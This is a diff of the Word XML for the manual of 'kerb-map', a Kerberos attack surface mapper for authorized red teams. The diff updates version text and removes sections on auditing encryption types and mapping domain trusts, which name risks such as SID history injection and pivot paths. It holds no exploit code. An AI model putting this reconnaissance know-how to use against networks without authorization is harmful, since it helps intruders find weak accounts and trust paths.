-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:color w:val="888888"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>v1.0  —</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:color w:val="888888"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve">  Kerberos Attack Surface Mapper</w:t>
+        <w:t>kerb-map v1.1  —  Kerberos Attack Surface Mapper</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -21228,27 +19944,7 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t xml:space="preserve">Built for </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:color w:val="AAAAAA"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>authorized</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:color w:val="AAAAAA"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> penetration testers and red team operators.</w:t>
+        <w:t>Built for authorized penetration testers and red team operators.</w:t>
       </w:r>
     </w:p>
     <w:sectPr>
@@ -21316,7 +20012,7 @@
         <w:sz w:val="16"/>
         <w:szCs w:val="16"/>
       </w:rPr>
-      <w:t>v1.0  —</w:t>
+      <w:t>v1.1  —</w:t>
     </w:r>
     <w:proofErr w:type="gramEnd"/>
     <w:r>

--- a/kerb-map-manual.docx
+++ b/kerb-map-manual.docx
@@ -1,6 +1,6 @@
 
 <file path=word/document.xml><?xml version="1.0" encoding="utf-8"?>
-<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
+<w:document xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
   <w:body>
     <w:p>
       <w:pPr>
@@ -205,853 +205,6 @@
         </w:rPr>
         <w:t>For use in authorized penetration testing and red team engagements only.</w:t>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="60" w:after="60"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-        <w:pBdr>
-          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="2471A3"/>
-        </w:pBdr>
-      </w:pPr>
-      <w:bookmarkStart w:id="100" w:name="_Toc224561350"/>
-      <w:r>
-        <w:t>4.5  Encryption Auditor  (--encryption)</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="100"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="60" w:after="80"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="333333"/>
-        </w:rPr>
-        <w:t>Audits Kerberos encryption type configuration across all domain accounts and Domain Controllers. Weak encryption (RC4/DES) enables faster offline cracking and downgrade attacks.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="60" w:after="60"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="60" w:after="80"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="333333"/>
-        </w:rPr>
-        <w:t>The module queries msDS-SupportedEncryptionTypes for all enabled user accounts and all DCs (userAccountControl bit 8192).</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="60" w:after="60"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-    </w:p>
-    <w:tbl>
-      <w:tblPr>
-        <w:tblW w:w="9360" w:type="dxa"/>
-        <w:tblBorders>
-          <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-          <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-          <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-          <w:insideH w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-          <w:insideV w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-        </w:tblBorders>
-        <w:tblCellMar>
-          <w:left w:w="10" w:type="dxa"/>
-          <w:right w:w="10" w:type="dxa"/>
-        </w:tblCellMar>
-        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
-      </w:tblPr>
-      <w:tblGrid>
-        <w:gridCol w:w="3120"/>
-        <w:gridCol w:w="3120"/>
-        <w:gridCol w:w="3120"/>
-      </w:tblGrid>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="3120" w:type="dxa"/>
-            <w:shd w:val="clear" w:color="auto" w:fill="2C3E50"/>
-            <w:tcMar>
-              <w:top w:w="80" w:type="dxa"/>
-              <w:bottom w:w="80" w:type="dxa"/>
-              <w:left w:w="120" w:type="dxa"/>
-              <w:right w:w="120" w:type="dxa"/>
-            </w:tcMar>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-                <w:color w:val="FFFFFF"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t>Check</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="3120" w:type="dxa"/>
-            <w:shd w:val="clear" w:color="auto" w:fill="2C3E50"/>
-            <w:tcMar>
-              <w:top w:w="80" w:type="dxa"/>
-              <w:bottom w:w="80" w:type="dxa"/>
-              <w:left w:w="120" w:type="dxa"/>
-              <w:right w:w="120" w:type="dxa"/>
-            </w:tcMar>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-                <w:color w:val="FFFFFF"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t>Condition</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="3120" w:type="dxa"/>
-            <w:shd w:val="clear" w:color="auto" w:fill="2C3E50"/>
-            <w:tcMar>
-              <w:top w:w="80" w:type="dxa"/>
-              <w:bottom w:w="80" w:type="dxa"/>
-              <w:left w:w="120" w:type="dxa"/>
-              <w:right w:w="120" w:type="dxa"/>
-            </w:tcMar>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-                <w:color w:val="FFFFFF"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t>Risk</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="3120" w:type="dxa"/>
-            <w:tcMar>
-              <w:top w:w="60" w:type="dxa"/>
-              <w:bottom w:w="60" w:type="dxa"/>
-              <w:left w:w="120" w:type="dxa"/>
-              <w:right w:w="120" w:type="dxa"/>
-            </w:tcMar>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="333333"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t>RC4-only accounts</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="3120" w:type="dxa"/>
-            <w:tcMar>
-              <w:top w:w="60" w:type="dxa"/>
-              <w:bottom w:w="60" w:type="dxa"/>
-              <w:left w:w="120" w:type="dxa"/>
-              <w:right w:w="120" w:type="dxa"/>
-            </w:tcMar>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="333333"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t>enc=0 or RC4 set without AES</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="3120" w:type="dxa"/>
-            <w:tcMar>
-              <w:top w:w="60" w:type="dxa"/>
-              <w:bottom w:w="60" w:type="dxa"/>
-              <w:left w:w="120" w:type="dxa"/>
-              <w:right w:w="120" w:type="dxa"/>
-            </w:tcMar>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="333333"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t>HIGH</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="3120" w:type="dxa"/>
-            <w:tcMar>
-              <w:top w:w="60" w:type="dxa"/>
-              <w:bottom w:w="60" w:type="dxa"/>
-              <w:left w:w="120" w:type="dxa"/>
-              <w:right w:w="120" w:type="dxa"/>
-            </w:tcMar>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="333333"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t>DES accounts</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="3120" w:type="dxa"/>
-            <w:tcMar>
-              <w:top w:w="60" w:type="dxa"/>
-              <w:bottom w:w="60" w:type="dxa"/>
-              <w:left w:w="120" w:type="dxa"/>
-              <w:right w:w="120" w:type="dxa"/>
-            </w:tcMar>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="333333"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t>DES-CBC-CRC or DES-CBC-MD5 enabled</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="3120" w:type="dxa"/>
-            <w:tcMar>
-              <w:top w:w="60" w:type="dxa"/>
-              <w:bottom w:w="60" w:type="dxa"/>
-              <w:left w:w="120" w:type="dxa"/>
-              <w:right w:w="120" w:type="dxa"/>
-            </w:tcMar>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="333333"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t>CRITICAL</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="3120" w:type="dxa"/>
-            <w:tcMar>
-              <w:top w:w="60" w:type="dxa"/>
-              <w:bottom w:w="60" w:type="dxa"/>
-              <w:left w:w="120" w:type="dxa"/>
-              <w:right w:w="120" w:type="dxa"/>
-            </w:tcMar>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="333333"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t>Weak DCs</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="3120" w:type="dxa"/>
-            <w:tcMar>
-              <w:top w:w="60" w:type="dxa"/>
-              <w:bottom w:w="60" w:type="dxa"/>
-              <w:left w:w="120" w:type="dxa"/>
-              <w:right w:w="120" w:type="dxa"/>
-            </w:tcMar>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="333333"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t>DC supports RC4 or has no explicit AES</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="3120" w:type="dxa"/>
-            <w:tcMar>
-              <w:top w:w="60" w:type="dxa"/>
-              <w:bottom w:w="60" w:type="dxa"/>
-              <w:left w:w="120" w:type="dxa"/>
-              <w:right w:w="120" w:type="dxa"/>
-            </w:tcMar>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="333333"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t>HIGH</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-    </w:tbl>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="60" w:after="60"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="60" w:after="80"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="333333"/>
-        </w:rPr>
-        <w:t>All findings feed into the priority scorer — weak DCs score 65 (HIGH), DES accounts score 60 (HIGH).</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="60" w:after="60"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-        <w:pBdr>
-          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="2471A3"/>
-        </w:pBdr>
-      </w:pPr>
-      <w:bookmarkStart w:id="101" w:name="_Toc224561351"/>
-      <w:r>
-        <w:t>4.6  Trust Mapper  (--trusts)</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="101"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="60" w:after="80"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="333333"/>
-        </w:rPr>
-        <w:t>Enumerates all domain trusts and assesses their risk based on direction, type, SID filtering status, and encryption.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="60" w:after="60"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="60" w:after="80"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="333333"/>
-        </w:rPr>
-        <w:t>LDAP filter: (objectClass=trustedDomain)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="60" w:after="80"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="333333"/>
-        </w:rPr>
-        <w:t>Attributes: name, trustDirection, trustType, trustAttributes, securityIdentifier</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="60" w:after="60"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading3"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Risk Assessment</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="60" w:after="60"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-    </w:p>
-    <w:tbl>
-      <w:tblPr>
-        <w:tblW w:w="9360" w:type="dxa"/>
-        <w:tblBorders>
-          <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-          <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-          <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-          <w:insideH w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-          <w:insideV w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-        </w:tblBorders>
-        <w:tblCellMar>
-          <w:left w:w="10" w:type="dxa"/>
-          <w:right w:w="10" w:type="dxa"/>
-        </w:tblCellMar>
-        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
-      </w:tblPr>
-      <w:tblGrid>
-        <w:gridCol w:w="3120"/>
-        <w:gridCol w:w="1560"/>
-        <w:gridCol w:w="4680"/>
-      </w:tblGrid>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="3120" w:type="dxa"/>
-            <w:shd w:val="clear" w:color="auto" w:fill="2C3E50"/>
-            <w:tcMar>
-              <w:top w:w="80" w:type="dxa"/>
-              <w:bottom w:w="80" w:type="dxa"/>
-              <w:left w:w="120" w:type="dxa"/>
-              <w:right w:w="120" w:type="dxa"/>
-            </w:tcMar>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-                <w:color w:val="FFFFFF"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t>Configuration</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="1560" w:type="dxa"/>
-            <w:shd w:val="clear" w:color="auto" w:fill="2C3E50"/>
-            <w:tcMar>
-              <w:top w:w="80" w:type="dxa"/>
-              <w:bottom w:w="80" w:type="dxa"/>
-              <w:left w:w="120" w:type="dxa"/>
-              <w:right w:w="120" w:type="dxa"/>
-            </w:tcMar>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-                <w:color w:val="FFFFFF"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t>Risk</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4680" w:type="dxa"/>
-            <w:shd w:val="clear" w:color="auto" w:fill="2C3E50"/>
-            <w:tcMar>
-              <w:top w:w="80" w:type="dxa"/>
-              <w:bottom w:w="80" w:type="dxa"/>
-              <w:left w:w="120" w:type="dxa"/>
-              <w:right w:w="120" w:type="dxa"/>
-            </w:tcMar>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-                <w:color w:val="FFFFFF"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t>Why</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="3120" w:type="dxa"/>
-            <w:tcMar>
-              <w:top w:w="60" w:type="dxa"/>
-              <w:bottom w:w="60" w:type="dxa"/>
-              <w:left w:w="120" w:type="dxa"/>
-              <w:right w:w="120" w:type="dxa"/>
-            </w:tcMar>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="333333"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t>Forest trust + SID filtering OFF</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="1560" w:type="dxa"/>
-            <w:tcMar>
-              <w:top w:w="60" w:type="dxa"/>
-              <w:bottom w:w="60" w:type="dxa"/>
-              <w:left w:w="120" w:type="dxa"/>
-              <w:right w:w="120" w:type="dxa"/>
-            </w:tcMar>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="333333"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t>CRITICAL</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4680" w:type="dxa"/>
-            <w:tcMar>
-              <w:top w:w="60" w:type="dxa"/>
-              <w:bottom w:w="60" w:type="dxa"/>
-              <w:left w:w="120" w:type="dxa"/>
-              <w:right w:w="120" w:type="dxa"/>
-            </w:tcMar>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="333333"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t>SID history injection across forest boundary</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="3120" w:type="dxa"/>
-            <w:tcMar>
-              <w:top w:w="60" w:type="dxa"/>
-              <w:bottom w:w="60" w:type="dxa"/>
-              <w:left w:w="120" w:type="dxa"/>
-              <w:right w:w="120" w:type="dxa"/>
-            </w:tcMar>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="333333"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t>Bidirectional + no SID filtering</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="1560" w:type="dxa"/>
-            <w:tcMar>
-              <w:top w:w="60" w:type="dxa"/>
-              <w:bottom w:w="60" w:type="dxa"/>
-              <w:left w:w="120" w:type="dxa"/>
-              <w:right w:w="120" w:type="dxa"/>
-            </w:tcMar>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="333333"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t>HIGH</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4680" w:type="dxa"/>
-            <w:tcMar>
-              <w:top w:w="60" w:type="dxa"/>
-              <w:bottom w:w="60" w:type="dxa"/>
-              <w:left w:w="120" w:type="dxa"/>
-              <w:right w:w="120" w:type="dxa"/>
-            </w:tcMar>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="333333"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t>Pivot path with SID history abuse</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="3120" w:type="dxa"/>
-            <w:tcMar>
-              <w:top w:w="60" w:type="dxa"/>
-              <w:bottom w:w="60" w:type="dxa"/>
-              <w:left w:w="120" w:type="dxa"/>
-              <w:right w:w="120" w:type="dxa"/>
-            </w:tcMar>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="333333"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t>Bidirectional trust</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="1560" w:type="dxa"/>
-            <w:tcMar>
-              <w:top w:w="60" w:type="dxa"/>
-              <w:bottom w:w="60" w:type="dxa"/>
-              <w:left w:w="120" w:type="dxa"/>
-              <w:right w:w="120" w:type="dxa"/>
-            </w:tcMar>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="333333"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t>MEDIUM</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4680" w:type="dxa"/>
-            <w:tcMar>
-              <w:top w:w="60" w:type="dxa"/>
-              <w:bottom w:w="60" w:type="dxa"/>
-              <w:left w:w="120" w:type="dxa"/>
-              <w:right w:w="120" w:type="dxa"/>
-            </w:tcMar>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="333333"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t>Pivot possible if partner domain compromised</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="3120" w:type="dxa"/>
-            <w:tcMar>
-              <w:top w:w="60" w:type="dxa"/>
-              <w:bottom w:w="60" w:type="dxa"/>
-              <w:left w:w="120" w:type="dxa"/>
-              <w:right w:w="120" w:type="dxa"/>
-            </w:tcMar>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="333333"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t>RC4 encryption on trust</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="1560" w:type="dxa"/>
-            <w:tcMar>
-              <w:top w:w="60" w:type="dxa"/>
-              <w:bottom w:w="60" w:type="dxa"/>
-              <w:left w:w="120" w:type="dxa"/>
-              <w:right w:w="120" w:type="dxa"/>
-            </w:tcMar>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="333333"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t>LOW</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4680" w:type="dxa"/>
-            <w:tcMar>
-              <w:top w:w="60" w:type="dxa"/>
-              <w:bottom w:w="60" w:type="dxa"/>
-              <w:left w:w="120" w:type="dxa"/>
-              <w:right w:w="120" w:type="dxa"/>
-            </w:tcMar>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="333333"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t>Weak encryption</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-    </w:tbl>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="60" w:after="60"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="60" w:after="80"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="333333"/>
-        </w:rPr>
-        <w:t>Output is a Rich table showing trust partner, direction, type, SID filtering status, and risk level.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:br w:type="page"/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
